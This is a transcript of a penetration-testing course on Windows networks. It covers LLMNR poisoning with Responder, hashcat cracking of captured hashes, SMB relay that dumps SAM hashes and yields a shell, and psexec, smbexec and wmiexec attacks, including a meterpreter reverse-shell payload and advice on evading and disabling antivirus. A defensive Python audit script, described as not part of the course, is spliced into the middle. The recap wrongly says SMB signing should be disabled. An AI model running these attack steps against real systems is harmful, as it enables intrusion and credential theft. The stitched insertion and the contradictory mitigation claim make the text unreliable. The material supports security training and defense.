doing here is we're listening in the man of the middle situation and this is very very common so what happens here is if passwords are weak and guessable then we're going to be able to crack these passwords with any sort of decent password cracking rig and for example I'm using a 2080 TI which is pretty latest and greatest pretty powerful right now there are some rigs out there that will stack like four to six of these 2080 TI's or even better but you don't necessarily need that when I was first starting out I was using a 970 graphics card and it was doing just fine for cracking the better the graphics card the better your cracking speed will be but you don't have to have the latest and greatest to perform a lot of these tasks right now and chances are when you go work for somebody they're going to have a cracking rig anyway so not something you have to worry about too too much but to understand this attack the less complex the password the better off we are because we're going to be able to crack these passwords and then once we have a cracked password account there's a lot of cool things that we can do to leverage that to actually get on to a machine so we're going to cover that as well as we get into this and get deeper as to what can we do to get access once we have a password and how can we leverage that so from here just your big takeaway is we're doing man in the middle listening we're listening for any sort of event where we can take over in place of DNS and we're going to respond to these with the tool called responder we're going to pull down these hashes take them offline and try to crack them if the passwords are weak or and when I say week I mean like less than 14 characters the longest password that I've ever cracked is 19 characters and that was a Bible verse so I always tell clients that just because your password is long does not mean that it is good your password should be non-common words or long sentences or something greater than 14 characters 
but also complex so the longer and the more complex the better but honestly I will take a 40 character sentence without any complexity at all over a 14 character password that has some complexity capital letter exclamation point Etc because we can still crack these and you're going to see that later on us cracking a pretty lengthy password but still a guessable password so that's the takeaways from this let's go ahead and move on to the next video when we're going to actually talk about performing this we're going to perform this live and see how to do it and then we'll talk about defenses as well so let's go ahead and jump over there all right so now we're going to utilize responder and we're going to pull down this hash so you should already have the impact toolkit installed if you don't there are multiple videos here so please be watching the videos all the way through don't skip ahead or go out and Google impact it GitHub and install it that way so from here let's go ahead and type in responder and you should be able to auto complete all we're going to type in now is a dash capital i and this is our interface our interface here is going to be ethernet 0 and I will go ahead and just open up a new tab because we're going to need that and let's go ahead and just type in ifconfig or IPA and you can see here that we have our IP address and it's on ethernet zero so that's what we're going to be listening on the inner ethernet 0 interface and then the rest that we're going to need is just a dash RDW so you don't have to worry too much about what this is this is just saying these are the different types of what we're gonna be listening on uh one of them is wpad you can look at the dash dash help for this but this is the most common settings and if you want to see a hash again more than once go ahead and just do a dash V so since we're not saving this output right now I just do a dash V for verbose this is an optional setting once you're actually working in the field 
but just for now just in case you capture the hash and you want to see it again this is a good way otherwise it stores in the log file for later on let's go ahead and just do a -rdw like this you can see okay it says hey you're listening on eth0 here's your IP address and when you scroll up here are your poisoners okay LLMNR and then when LLMNR fails it actually goes down and works on NBT-NS so it goes DNS, LLMNR, NBT-NS it's also listening on DNS and it's doing a few different things here it's running a few different servers and all we're doing is running those servers in the middle just to see if we can get a connection from any of these and try to intercept and respond back so you see here now it says it's listening for events so go ahead and go over to your Windows machine and you can see that I've actually put my Windows machines just as a lab setting this is kind of what's nice about having the actual Pro version is you can just keep all of your Windows machines in one area so I've got my Windows machine spun up I've got Windows Server 2016 and I've got the Windows 10 Frank Castle machine spun up so the Punisher and the Windows server and what we're going to do is we're just going to open up a file share like this or a folder and I'm just going to point this right at our attacker machine so mine was 192.168.57.139 I do believe so let's go ahead and double check that .57.139 okay and then all I'm going to do here is hit enter and it shouldn't resolve right this should this should wig out nothing should happen here and you see it's trying to enter your network credentials access is denied we actually do have a server up and running an SMB server and look what's happened here but like we do have we do have the SMB server up and running so it's trying to connect to that but you can see that it has pulled down the hash and it pulled it down twice which is fine but it's pulled down the IP address of the machine we're attacking the user and the user domain and then hash right here so everything that we talked about in the last one this is exactly what happens so let's go ahead and recap this and I'm going to blow this up so you're on your first assessment you're sitting on an internal and first thing you want to do at least in my my playbook one of the first things I'm doing I'm running responder now it just depends how loud we're going to be I'm going to show you some other things but this is especially if the client has never had a pen test before this is always a good go-to now clients are getting smarter about this attack and technique and we'll talk about that in the actual defense video for this but clients are getting smarter about this and they're starting to turn this off but for now I would say 70 percent of the clients that I test against are still running LLMNR in their networks and this is allowing for easy wins especially if they have a poor password policy which a lot of clients will so this is a great initial attack vector to capture some hashes and we'll capture these hashes take it offline try to crack it it's amazing we can do a lot with this so from here we're going to go ahead and install hashcat or use hashcat on our machine I'll show you a couple different methods of how we do it then we'll talk about defenses and move on to the next attack so let's go ahead
and move on to the next video I'll see you over there when we work on cracking this hash all right picking up where we left off we're going to utilize a tool called hashcat now hashcat is built into your Kali Linux machine though we're going to talk pros and cons of that here in just a second hashcat is a tool utilized to crack hashes and we're going to run it first on our Linux machine and our VM and then we're going to try running it elsewhere and just take a look at speed differences so what I want you to do is actually capture this whole hash here we're going to copy it and we'll just do something like gedit ntlmhash.txt it's fine and we'll paste that bad boy into here and just hit save now we're going to need to set up our hashcat so our hashcat is going to look something like this so it's going to say hashcat and then we're going to have to do a -m of 5600 just type this in with me I'm going to go ahead and show you what it means in just a second then we need our file that we're going to attempt to crack which is going to be ntlmhash.txt and then we're going to need a wordlist so we don't have the wordlist yet I'm going to show you where you can find that so first things first what the heck is this -m 5600 so if we go to a new tab and we just say hashcat --help well it tells us a bunch of different ways that we can attack hashes here and there's all different kinds of settings when it comes to hashcat but what we're after is a module right and look at all these different hashes we can crack now some of these might sound familiar like MD5 SHA1 etc but you know this is a long list of modules and here are all the different numbers that we have to go through and we have to look through these to find what we're after so here's NetNTLMv2 which is 5600 now we could do a little bit of Linux foo here and just you know narrow this down so we can say tab up hashcat --help and then what if we just say grep and we know the hash
is NTLM like that guess what we just pulled down four NTLMs and we can just pull the 5600 right out of here in case you ever forget I have it memorized since I do it so often you probably will as well also you can put this into your notebook and this will be a good place to have it and just say hey how do I crack NTLMv2 hashes here you go or have a hashcat cheat sheet there you go as well make your notes your own but of course as I've said this whole course please have notes so we've got our module we've got our hash now we need to crack that hash so we need a wordlist to do it let's go up to files I'm going to show you a little little area in our in our computer here so go ahead and go to other locations and we're going to do a computer and then we're going to go ahead and we're going to go to usr and then share right here and start typing in wordlists and that will bring you right to wordlists here now there is this rockyou.txt.gz go ahead and open that and once you open that just go ahead and say extract and we could put this into wordlists that's fine or we could put this let's put this uh let's put this in our home folder that'll work because we might use it again so let's go ahead and just extract this and it might take a second here now we're not going to open this up but rockyou is 140 megabytes and I can't tell you how many passwords are in here millions there's millions and millions of passwords in the rockyou.txt file this is just the default wordlist that comes with this there are lots of wordlists out there that you can choose from for example we could go out to we got the Firefox just go to Google and there are several different sites we could say google.com and we could say um hashcat wordlist and we can look for the and there's different ones password passphrase wordlist here there's another one called um SecLists so we say password SecLists like that and there's this great GitHub here for SecLists and you can come through here and they
have all different kinds so we can go through them usernames discovery passwords right here and they've got the top 100 top 10 000 uh all the way through 10 million passwords right so um the wordlist that I use is like 70 trillion or something insane and it takes about 15 minutes to go through so that's how fast a processor can work but you just kind of have to find your own uh look through them out there and it's probable that your company will have their own wordlist as well but when you're doing stuff like Hack The Box or you're just doing capture the flags usually something like rockyou is plenty sufficient you don't need to go above and beyond that once you start getting in a cracking user passwords then you should start looking for a better wordlist but for now we're going to go ahead and just say rockyou.txt since we put it into our home folder and now we have to also add in this --force now for me this is probably not going to work it's been a little bit since I've actually checked this I have a pretty new processor I'm running either a late i7 to an i9 and what this is doing here is it's going to try to run it but even still we're in a VM and the --force is saying hey I know I'm in a VM this is not going to run off my graphics card this is actually going to run off my CPU it's going to be a lot slower and we're going to try to force this to run off the CPU I'm going to hit enter yours may work mine will not work okay this is what mine looks like so because I'm in a VM it's still not going to work for me you might get a little bit uh better luck and it might work for you so here is the alternative you should always run your password cracking regardless of what tool it is but let's say hashcat you should always run it on whatever system you're running your base operating system for example I'm running on Windows so guess what we can do we can go out to Google we could say hashcat download and we'll be brought right to hashcat.net here come
to here and right here is the hashcat binaries so we can just download the binaries right here and I'll just go ahead and open this this is a 7-Zip file and this is hashcat 5.1 I'll bring this over you can see we just extract this and then we have our 64 exe right here and we can run the same kind of deal so go ahead and extract this and I'm going to show you how to run this what you're going to want to do is you're going to want to have your wordlist so if you need to go ahead and go into your files you should be able to copy and move over so copy your rockyou.txt onto your desktop or wherever you're going to be putting this I put this right into a folder on my desktop and I'll show you my actual cracking one so mine looks like this where I've got it 4.2.1 I'm a little outdated but I just have my hashcat in here and then I put my different hashes in here that I try to crack and I have rockyou sitting right here as well so you could put it right in the same folder it'll make it easier and then we'll go ahead and just attempt to crack these passwords right so I'm going to make a new text file here and I'm just going to call it hashes hashes.txt or hashes4.txt is what this one will be so I'm going to go ahead and just copy these hashes over here put it in a file and I'll show you what it's going to look like so should be exactly the same so I have a text file hashes4.txt and go ahead and see I might have to minimize this for us okay hashes.txt looks just like this I'll go ahead and save this or hashes4.txt and then I'm going to need to bring up a command prompt for you run it as administrator and I'll bring this over and I'm just going to go right into the folder I have it stored so C:\Users\Heath\Desktop\hashcat and from here the syntax is really the same the only thing I'm going to change is just a little bit of the file format for the executable so it's just hashcat64.exe the -m of 5600 is still the same and then we're going to say hashes4.txt and
then rockyou.txt and then I'm just going to do a -O this stands for optimize so I just want to optimize the output here and it's going to make this go a little bit faster but just best practice to use -O here okay and let's go ahead and just hit enter on this and this will take just a second to spin up and then you're going to notice as soon as it spins up see I can't even finish my sentence that's how fast it is as soon as it spins up it finds the password hash and it cracks it so you can see Password1 here and this is exactly what we set the password to so again this is a weak password very easy to figure out and when you run into organizations like this you're going to see this all over the place and I still estimate like 70 percent of the clients that I'm I'm going up against are are using LLMNR, NBT-NS and they're using weak passwords so these are just really easy wins when it comes to you know movement in the network and getting that initial foothold this is why LLMNR poisoning is such a big one such a common popular one to be used so again this comes down to password policy and having a good password policy we're going to crack these these small small passwords we're going to crack passwords that have common characters and we'll talk about this in defenses but we really just want to let the client know you know like this is a good indicator to let them know like we we capture these hashes and we crack them or capture these hashes so we didn't and that's a good indicator of their policy and other things to check too if your rockyou or whatever wordlist that you're using doesn't work then you could still go and use other things like their name for example the company name with a one or one exclamation or one two three you just gotta get creative with it and think outside the box and things again like fall 2019 or whatever year it is winter whatever whatever season it is as well putting those in there and just trying to use the easy way
out you got to think like a user who's wanting to use the easy way out and you're going to be very successful with this so that is it for this lesson from here we're gonna go on and talk about the mitigation strategies and then we'll move on into some more attacks so I'll catch you over in the next video all right let's talk LLMNR mitigation so the best defense here is to actually disable LLMNR you have to disable not only LLMNR but also NBT-NS because remember if DNS fails it goes to LLMNR if LLMNR fails it goes to NBT-NS just cutting out LLMNR isn't enough so to fully disable this you have to disable both here is how you kind of do it this is just a copy and paste of what I would actually send to a client or put on a report for a client as to how to disable this if they are not able to disable LLMNR or they just refuse to then the second option is to tell them to enable network access control which if you're not familiar with what that means network access control means that hey I can't just go and plug into any port on your network and gain access it's going to look for a MAC address and say does this MAC address belong and should we allow it and a lot of the times if it doesn't belong or it's not allowed you're actually going to shut that port down or otherwise it's just not going to let you on the network so there are bypasses to network access control but think again that this is an internal and you just want to make it as hard as possible for somebody to get into your network and that would prevent this attack from even happening or at least you know stall the attack from happening the other thing here is to require the strong user passwords so 14 characters or longer you know 40 character passwords probably the best you know long sentence whatever however long you want to make it but it should be longer than 14 characters and that's really what you want to harp on your your policies to your clients is you you want to tell them like yeah you can have your minimum
but you should stress how easy it is to crack these passwords the longer the password the harder it is to crack and it goes from like seven or eight characters being you know a couple hours to or even seconds to hours you know from 14 characters 15 characters being years to crack in a brute force attempt so just that difference in a few extra characters and just making it a little bit longer really does make a difference and it makes it really hard on us as an attacker to be successful so hopefully that makes a little bit more sense and when you're in an interview you can talk through LLMNR talk about disabling it for best case scenarios and talk about other mitigations to prevent these sorts of attacks as well so from here we're going to move on and talk about how we can utilize LLMNR poisoning to our advantage in other ways and not just capture a hash and crack it but actually use that hash to our advantage and gain access to a machine so let's go ahead and take a look at that all right so now let's talk about SMB relay well what is SMB relay so think about your responder and think about how you were capturing these hashes well instead of taking the hashes that you capture offline and trying to crack them with hashcat well we can take those hashes and we can actually just relay those to another machine well how is this possible so let's talk about the requirements big requirement number one requirement is that SMB signing has to be disabled on the target now SMB signing is a packet level protocol so let's think about this if SMB signing is enabled when we try to relay credentials it's going to say hey you're not really that person you know this packet's not signed by you and I'm not going to let you in but if SMB signing is disabled it never checks for that it never checks for authenticity of where this is coming from it just says hey there's a user there's their hash I'm going to let them on this machine if they have the permission to do so so we're going
to take this first requirement and add in a second requirement which is that the user being relayed has to have admin credentials on that machine so we cannot relay a credential that we captured from one machine back to the same machine say we're like .6 we can't relay that credential to .6 as well this has to be on two separate machines and that user has to be an admin on that machine with SMB signing disabled so we're going to take say Frank Castle he's going to be an admin on two machines like we set up we're going to take the captured hash relay it over to another machine where he's also an admin and we're going to do some malicious things to that machine so let's take a look at this from a more actual perspective so the first thing that we're going to do is we're actually going to go into the responder configuration file and we're going to turn off SMB and HTTP so we're going to be listening but we're not going to be responding on these servers okay so what that means is we're going to use responder to capture and then we're going to use another tool to relay but we're not actually going to respond back so once this configuration is set what we're going to do is we're going to boot up responder so with responder booted up same way as before you're going to notice here the only difference is there's red on the HTTP and red on the SMB server the auth proxy was off by default and still remains off so this is how your configuration should look once this is configured we also need to configure a tool called ntlmrelayx so ntlmrelayx takes the relay it passes it to a target file that you specify and we'll talk about how we identify those targets in the next video and then we're going to say smb2support as a switch as well so that we can incorporate anything with SMB2.
so what we're going to do here is all we're doing is identifying where we want to target and where we want to relay to so we have our responder listening we have our relay ready to go and then we just wait for an event to happen same event as before we pointed at this machine with responder listening it can't access this machine DNS fails okay responder kicks in responds to that message or doesn't respond to that message I should say and instead it relays these credentials that it captures to this other machine you could see it here it says hey we received a connection from 10.0.3.7 and we're going to attack the target of 10.0.3.6 using Frank Castle's credentials if Frank Castle is an admin on that machine this is going to work so it authenticates against it it succeeds guess what now we're coming in here and we're dumping out sensitive information most importantly we are dumping out what is called a SAM file or the SAM hashes here right now remember back to our lesson on Linux when we talked about shadow files think of the SAM as the shadow of the Windows world these are all of our usernames and hashes for the local users on this computer again this is the local users on this computer this is not the domain users but that's okay we can take down an entire network and I've done it before utilizing only local users we're going to talk about that in a later video on how that can happen but from here we have usernames and hashes okay we could take these hashes offline again and try to crack them or we can pass this hash around and try to get access to other machines as well so take a look at both of those and see why this is really really interesting here later on so for now take away that we grab a hash we relay it to another machine if SMB signing is disabled we can get on that machine as long as we're an admin we can not only dump the SAM hashes like this but we can also take it further and get a full shell if we want to so we're going to do that in both scenarios
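Requirement number one above (SMB signing not enforced on the target) is something a defender can audit for across a whole subnet. The script below is an added example, not code from the course or from the Impacket, Responder or nmap projects: it parses the plain-text output of `nmap --script smb2-security-mode.nse -p445 <range>` (the check the course uses), treats "enabled but not required" the same as disabled, the way a relay does, and lists the hosts that need `RequireSecuritySignature` turned on. The sample scan text is constructed, and the exact wording nmap prints for a fully disabled SMB2 host is assumed to contain "disabled".

```python
"""Audit nmap smb2-security-mode output for hosts that do not enforce SMB signing.

Added example (not part of the course material). Assumes the text output of:
    nmap --script smb2-security-mode.nse -p445 <range>
"""
import re
from collections import OrderedDict

REQUIRED = "required"          # signing enforced: relayed sessions are rejected
NOT_REQUIRED = "not_required"  # enabled but not required (or disabled): relay-exposed
UNKNOWN = "unknown"            # port not open or no script result

# Constructed sample: a domain controller that requires signing, two workstations
# that do not, and a host whose port 445 is filtered (nothing to audit there).
SAMPLE_SCAN = """\
Nmap scan report for 192.168.57.1
Host is up (0.0012s latency).

PORT    STATE    SERVICE
445/tcp filtered microsoft-ds

Nmap scan report for 192.168.57.140
Host is up (0.00050s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required

Nmap scan report for punisher.marvel.local (192.168.57.141)
Host is up (0.00040s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required

Nmap scan report for 192.168.57.142
Host is up (0.00045s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required
"""

# First line of a host block: either "1.2.3.4" or "hostname (1.2.3.4)".
HOST_LINE_RE = re.compile(r"(\S+)(?: \((\d{1,3}(?:\.\d{1,3}){3})\))?")


def parse_smb_signing(scan_text):
    """Return an ordered {ip: status} map with one entry per scanned host."""
    results = OrderedDict()
    # One block per "Nmap scan report for ..." header; drop the preamble before the first host.
    blocks = re.split(r"(?m)^Nmap scan report for ", scan_text)[1:]
    for block in blocks:
        first_line, _, body = block.partition("\n")
        m = HOST_LINE_RE.match(first_line)
        ip = m.group(2) or m.group(1)
        if not re.search(r"^445/tcp\s+open\b", body, re.M):
            results[ip] = UNKNOWN  # nothing listening on 445, nothing to relay to
            continue
        sig = re.search(r"Message signing (.+)", body)
        if sig is None:
            results[ip] = UNKNOWN
            continue
        verdict = sig.group(1).strip().lower()
        # Check the weak cases first: "not required" also contains the word "required".
        if "not required" in verdict or "disabled" in verdict:
            results[ip] = NOT_REQUIRED
        elif "required" in verdict:
            results[ip] = REQUIRED
        else:
            results[ip] = UNKNOWN
    return results


def relay_exposed(results):
    """Hosts that would accept a relayed NTLM session because signing is not enforced."""
    return [ip for ip, status in results.items() if status == NOT_REQUIRED]


def hardening_report(results):
    """One remediation line per host that needs fixing (empty list if none)."""
    # RequireSecuritySignature lives under LanmanServer\Parameters on the target;
    # Set-SmbServerConfiguration -RequireSecuritySignature $true sets it in PowerShell.
    return [f"{ip}: SMB signing not required, set RequireSecuritySignature=1 (LanmanServer)"
            for ip in relay_exposed(results)]


if __name__ == "__main__":
    status = parse_smb_signing(SAMPLE_SCAN)
    for ip, st in status.items():
        print(f"{ip:16} {st}")
    print("\n".join(hardening_report(status)))
```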
we're going to play this scenario first then we're going to play another scenario where we actually get a shell you can see how you can do both of those so let's go ahead and move on to the next video we're actually going to demonstrate an SMB relay so there's one small modification we need to make before this attack can begin and be successful so on both of your Windows 10 machines this is something I forgot to tell you during the lab setup is we need to go to this network tab over here and make sure that our computer is visible to other devices so we're going to turn on network discovery and let's go ahead and just hit OK we're going to click up here and just say turn on network discovery and file sharing and now it's on okay and you can see that other machines are starting to show up that's great other machine same thing let's go in here let's go to network turn this guy on and then we should be able to proceed with this attack moving forward so let's go to the next video we start discovering how we can actually find machines that are disabled or have SMB signing disabled in our network all right so first things first we need to be able to identify what has SMB signing enabled and what has SMB signing disabled now there are a few different ways that we can do this one way would be to run a Nessus scan and when you run Nessus it'll tell you nice and neatly hey look this has SMB signing disabled on these servers and you can copy that list down if you want to another method which I'm going to show you is nmap we can run a specific script on nmap that is built in and it'll check for SMB signing and then lastly you can go out to GitHub and search for something like SMB signing check and you will find a bunch of different scripts that will do this for you or you can write your own if you really want to so what we're going to do is we're going to just use nmap here and just do a quick check and then we can kind of understand what we're looking for so we're going to type in
nmap and then we'll do a --script like this and the script is called smb2-security-mode.nse this is the nmap scripting engine and we're going to be looking just on port 445 and then we're going to sweep across the entire network that we're on so it should look something like this and it should go by pretty quick for us so let's go ahead and just enter and what's going to come back is whether or not the port is open as you can see here like this has filtered on this port it's going to come back whether or not the port is open and whether or not SMB signing is enabled or disabled let's ignore .1 .2 okay so .140 this is where we start at least for me .140 is our server so this is our domain controller and you can see in the domain controller message signing is enabled and required so remember when we talked about message signing we said that it is disabled by default on any workstation and enabled and required on every single server by default okay so we expect to see this we will not be able to relay to this machine however if we look at .141 which is the Punisher and .142 which is Spider-Man we can see here that .141 and .142 will both say the same thing message signing enabled but not required so it's enabled but it's not required meaning that we can still do a relay attack because of the non-requirement here so what we can do is we can take the list of IP addresses that we have here given .141 and .142 and put those into a list and we can go ahead and do that now so let's just go ahead and say gedit and you'll see my targets already here but we're going to say gedit targets.txt hit enter and I actually only want you to put one target in there so I'm using Peter Parker's machine so let's go ahead and just use Peter Parker's machine whichever one you have your secondary machine on you should have a .141 .142 whatever the IP address actually is go ahead and just pick one of those machines here in a perfect world you would put all your machines
in here but we're just going to simplify this for the attack go ahead and save that out and then I'm going to pause here we're going to meet in the next video where we configure everything and we'll set up the relay and see how the attack looks so I'll catch you over in the next video all right picking up right where we left off so we now have our targets.txt we can cat targets.txt and we've got the Spider-Man computer sitting here at .142 and remember our other computer is sitting at .141 and we're going to relay our credentials from responder from .141 to .142 and hopefully get something good back so we need to set up a responder so let's go ahead and go to gedit and we're going to go edit the /etc/responder/Responder.conf file this is the config file and remember we need to turn off SMB and we need to turn off HTTP here so your settings should look like this go ahead and save that and then we're going to run responder just like we did before so we're going to say responder -I like this eth0 and then -rdwv just like that should hit enter once you're ready and if we scroll up just a tad it should look just like the picture did before where we have a few more reds mixed in with these greens here SMB server is off HTTP server is off so now we're listening for events now we gotta set up the relay so let's go ahead and open up a new tab I'll make this a little bit bigger and we're going to use ntlmrelayx.py we're going to set that target file with the -tf and that is targets.txt and then we're just going to say -smb2support it should look just like that hit enter and now the server has been started we are waiting for a connection to happen so let's go ahead and trigger that connection so I'm going to open up my Punisher machine and I've already got it signed in so Punisher's online here make sure your Punisher's online and your Spider-Man machine's online and I'm going to just go ahead and point this right at my attacker machine again so 192.168.57.139 this is the same thing we've been doing with responder just this time it's going to relay instead of capture hash so go ahead and hit enter here it's going to say there's an error but look at what's happening here beautiful okay so we come in here and you can see it's connected a couple times let me make this bigger you see okay it comes in it says hey I'm receiving this connection from .141 let's go ahead and attack our target of .142 and it's going to authenticate it's going to succeed why remember SMB signing is disabled here it is enabled but not required that is considered the same exact thing okay so it succeeds and and most importantly Frank Castle fcastle here is an administrator on this computer because this user is an administrator on this computer guess what we dumped the SAM so we've dumped the SAM hashes and now we have these hashes these wonderful hashes okay and we can copy these hashes we can take them offline we could try to crack them and we can try to move laterally with these hashes what I want you to do is copy these hashes and we'll save them for later we'll talk about this again we'll revisit hashcat work on cracking these we'll also work on passing these around in a later section so for now just know that we have dumped the SAM hashes which is just like the shadow file on a Linux machine and there are things that we can do with these hashes so we're all building up into gaining shells getting access doing more cool stuff but here we've got some access to this machine and now we can start trying to move laterally with the access that we have or even move vertically so from here that's it I just wanted to show you this quick demonstration of how this could be potentially vulnerable and this is an easy attack to pull off and it's by design again no settings really changed right this is just how default Windows environments are so this is a very common occurrence especially if the environment has a lot of
local admins and you have a lot of local admins on the same machine or the same user local admin on a lot of different machines so from here we're going to make another video and the next video is going to cover improving upon this just one example of how we can improve upon this we can actually take this and get a shell out of this so I'm going to show you how to do that and we'll improve upon it then we'll talk about how we can prevent this or talk some defenses and then we'll move on to the next attack so I'll catch you over in the next video all right let's take a look at making this shell interactive for us so we're going to run the same situation here I'm just going to tab up because I already have it saved so let's boot up responder again if you're just catching up we have HTTP off we have SMB off and we've got responder listening let's go ahead and load up ntlmrelayx and the only thing that I'm going to do here a little bit differently is at the end I'm putting in a -i now -i stands for interactive and we're going to try to get an interactive shell here let's take a look at what this looks like so go ahead and hit enter this is just going to sit around and wait and we're going to trigger that event again so let's go ahead and do that I'm going to log in triggered this event one more time let's see what happens over here okay so you can see it says received the connection it succeeded and then it says it created an SMB client shell on 127.0.0.1 11000 so yours should say something very similar to that go ahead and open up a new tab and just say something along the lines of netcat 127.0.0.1 11000 and then it says type help for a list of commands let's say help now we are in an SMB shell essentially and we can do quite a bit of things here we're in a file share so what can we do well we can uh we can look at the shares we can use a certain share we can change the password of our current user and we
can look at making directories removing directories removing files we can put new files get new files we can create a mount point there's a lot of different things we can do okay and so let's take a look at this so let's just say shares and we've got the C drive ADMIN$ IPC$ and we got that share folder that we created um so let's go ahead and just do something like use C$ okay and let's go ahead and just say ls now look where we're at we've got access to the C drive here if we wanted to use the ADMIN$ which we could get to this other ways we just say use ADMIN$ hit enter ls and look now we're in the ADMIN$ so we're in System32 here on a Windows machine and we just have full control of this computer we can add files get files we have a lot of control here so there are other things that we can do as well that we're not going to cover but I do encourage you to explore so I'm going to Ctrl-C this couple things to point out is we can say something like -e for execute and then we could set up a Meterpreter listener like uh test.exe we can generate msfvenom to create a payload and then we can set up a Meterpreter listener and go get a shell in Metasploit with multi/handler we could do a -c for command so that this executes some specific command when we run the machine it could be something as simple as whoami uh to a complex PowerShell reverse shell or something along those lines that we can talk back to us as well and get a shell with that so the interactive shell is not the only way to do these but it's another way to do things so we just want to improve upon everything that we get so again we have those hashes we're going to figure out what we can do with those hashes later so again make sure you have those saved once we get to the post compromise attacks section we're going to abuse those frequently so for now that's it let's go ahead and talk in the next video about defenses and then we'll talk a little bit about gaining shells and some other
attack vectors before we get into post-compromise enumeration so I will catch you over in the next video let's talk about mitigation strategies so what can we do here well we can enable SMB signing on all devices right and that is the go-to strategy the pro here is that it completely stops the attack the con is that there can be performance issues with file copies it's reported that it's about a 15 percent or so decrease in speed on file transfers when you're running with SMB so that SMB signing does cause a little bit longer time period but the thing I argue is that the longer time period for you know computer security is worth it it's worth the trade-off other options that you can take is you can disable NTLM authentication on the network if there is no NTLM authentication then it completely stops the attack however if Kerberos stops working as the authentication method then Windows is going to default back to NTLM anyway so it's not a fail-safe completely more things account tiering is super important so what that means is if you have a domain administrator that domain administrator is only logging into their domain accounts or their their domain servers their domain controllers right they're not logging into a user account because that would be really bad if we can capture a domain administrator in this sort of attack uh the other thing too is that you want local admin restriction here so if we don't have a local administrator this can prevent a lot of lateral movement we can't really get the shell we can't get the hashes that we saw none of that would happen if that Frank Castle user was not also a local administrator on another machine so the con here is that you might see a potential increase in the amount of service desk tickets users complain about it they always want to have admin but it's not usually in the best interest of the company to give your users administrator rights on a computer so that's it for SMB relay big thing to talk about again is that SMB
signing should be disabled and that local admins should be really restricted here. The other two are just best practice sort of things, but still don't completely eliminate the attack. So from here we're going to go ahead and talk about gaining shell access and how we can gain shells with some of the information that we've already gathered right now, and then we'll move into some IPv6 attacks, which are really, really fun, and on to enumeration. So I'll see you over in the next video.

All right, let's talk about gaining shell access. Now, this should be somewhat of a refresher video, because we covered a lot of this in the mid-course capstone, but I just want you to think about what you can do now that you have a credential. So, so far all we have is a credential, right? And we're going to see what we can do with that credential. So the first thing I want to do is I want to boot up Metasploit, and we'll say msfconsole, and if we have SMB open and we have a username and a password, well then we can use that username and password, and especially if that user has a machine where they're a local administrator, to gain a shell. We can use that with psexec. So we can search for psexec, or if you know the Windows exploit, exploit/windows/smb/psexec, you can do that as well. So here it's "use 10"; it's line 10 right here, and we'll just say "options." Now what we can do is we can set the RHOSTS, so we know the fcastle machine is at 192.168.57.141, and then we have to say "set SMBDomain marvel.local," "set SMBPass Password1," and "set SMBUser fcastle," okay. We could say "options" here and we could try to run this, but we need to run this with the appropriate payload. So let's go ahead and just set the payload right off the bat with "set payload windows/x64/meterpreter/reverse_tcp," and we'll go ahead and say "options," make sure everything looks set. Let's go ahead and set an LHOST as well, so we'll set the LHOST to eth0 here, and we'll go ahead and give this a run and see what happens. Now this
doesn't always authenticate on the first go, and it doesn't always authenticate with the first automatic targeting, so we may have to give this a go with a second attempt, or we may have to give this a go and see. It's not working here; we'll give it a go one more time. Looks like it's doing PowerShell; PowerShell might not work here, we might have to try a different target. So it's always good to explore your targets here, and psexec is one of those funky ones where either it's going to work or it's not going to work with that specific one. So let's show, let's "show targets," and we've got Automatic, PowerShell, Native upload, and MOF upload. So let's go ahead and just "set target 2," and we'll run that, and we've got a virus detected. What happened? Oh no. So if we go to our Windows machine, you may have heard the ding: we've, uh, we've got a virus detection here. So, um, what's happening is that we are, we are blocking this virus with the psexec, right, and somehow Windows Defender got turned back on. I don't know how that happened, but that's okay; if yours got turned back on, that's fine as well. This is a good learning lesson. So psexec's getting blocked. So what if we can't psexec? Okay, let's try something different. Um, let's go ahead and let's try a new tool. So let's go ahead and let's try psexec.py and see if that works. Let's do a --help just to see how this looks. This should be familiar to you, right? We're just going to use the domain/username, and then the password, at the target name. So all we're going to say is marvel.local, and we're going to say something like fcastle, and then we'll give it the Password1 at 192.168.57.141. Run that. Apologies, it's a forward slash; try that. Okay, and look here: so Meterpreter got picked up, psexec.py did not, okay, we got a shell with psexec.py. Now this is a little bit more obscure. This is not infinitely more obscure; there are still antiviruses that are going to pick this up, but Windows Defender, which I love Windows Defender, Windows Defender did not
pick it up right here, so bad on Windows Defender. Um, but still, here we are, we've got a shell in the system. Now we could take this and we can get a little bit quieter, so we can say Ctrl+C and kill this, and we can go in and we can do smbexec or wmiexec. We could say smbexec like that, and that one didn't work. Okay, let's try wmiexec and see if we can get that one to work, and this one doesn't look like it's going to work either, which is okay. So we need other options, and this isn't the first time you're seeing any of this, right? We saw this in the very last video of the mid-course capstone, where we can try smbexec and wmiexec, and just be familiar with these tools. So what you have, and what I'm trying to point out here, is don't give up on the first tool. You have at least four options I just provided you here, and if you saw in Metasploit we actually have more than that; we have a PowerShell feature as well. If we scroll up just a little bit, there is a PowerShell version of, uh, psexec as well. So don't just give up at the first one, and know that there are multiple options. And if I alt-tab back into that, you can see too that, you know, we were able to get in with our psexec, but we weren't able to get in with our, um, with our wmiexec, or we weren't able to get in with our psexec on Metasploit either, right? So it's important to know that we have all these different options available to us, and that psexec is one of the more noisy when it comes to antivirus, so I would avoid starting here. My tip, pro tip, is to start with something like smbexec or wmiexec; see if they work, see if you can get a shell. If you can, what you can do... they're only like half shells is what they're considered; they're not fully interactive, but they're good enough to navigate around the C drive. You can issue commands with these; there's a lot of things that you can do. So what you need to do is you navigate around and you issue some commands and you say, hey, let me figure out what type of antivirus, if
anything's running, and then once you figure out what's running, try to see if you can't disable that antivirus so then you can run something more robust like Windows Meterpreter, or Meterpreter on Windows, because it just does so much more for us. So what we're going to do is we're going to go back and we're going to disable that in Defender. I'm going to make sure that that's all disabled again. If yours re-enabled, just go ahead and disable it as well as we move forward; make sure those are disabled so that we can perform some of these other attacks with Metasploit. And again, the tip here is to make sure you get in quietly first: go in, navigate around, try to find the antivirus that's being used, then attempt to use something like psexec or even another method in Metasploit to get around it. So hopefully that all makes sense and you don't give up at the first failure. So that's it for this video; we're going to move on to IPv6 attacks next.

